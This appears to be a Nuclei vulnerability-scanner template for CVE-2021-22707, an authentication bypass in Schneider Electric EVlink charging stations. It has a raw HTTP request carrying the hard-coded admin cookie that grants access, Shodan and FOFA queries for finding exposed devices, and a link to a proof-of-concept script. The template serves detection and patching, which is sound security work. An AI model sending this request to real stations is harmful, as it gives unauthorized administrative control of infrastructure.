id: CVE-2021-22707 info: name: EVlink City < R8 V3.4.0.1 - Authentication Bypass author: ritikchaddha,dorkerdevil severity: critical description: | A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges. remediation: | Upgrade to EVlink City R8 V3.4.0.1 or later to fix the authentication bypass vulnerability. reference: - https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh - https://nvd.nist.gov/vuln/detail/CVE-2021-22707 - http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-06 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-22707 cwe-id: CWE-798 epss-score: 0.3812 epss-percentile: 0.96786 cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: schneider-electric product: evlink_city_evc1s22p4_firmware shodan-query: title:"EVSE web interface" fofa-query: title="EVSE web interface" tags: cve,cve2021,evlink,auth-bypass http: - raw: - | GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin host-redirects: true max-redirects: 2 cookie-reuse: true matchers-condition: and matchers: - type: word words: - '?worker=Cluster" name="cluster" id="id_cluster' - type: status status: - 200 # digest: 490a00463044022013a490dc791438aa1624c6e9219c1fcb9996d4ec060c33b22bbaf4340bbd67c80220678990c2a6b404bb7766784c49304cc75df97619bf414b6031e5d010edecb66d:922c64590222798bb761d5b6d8e72950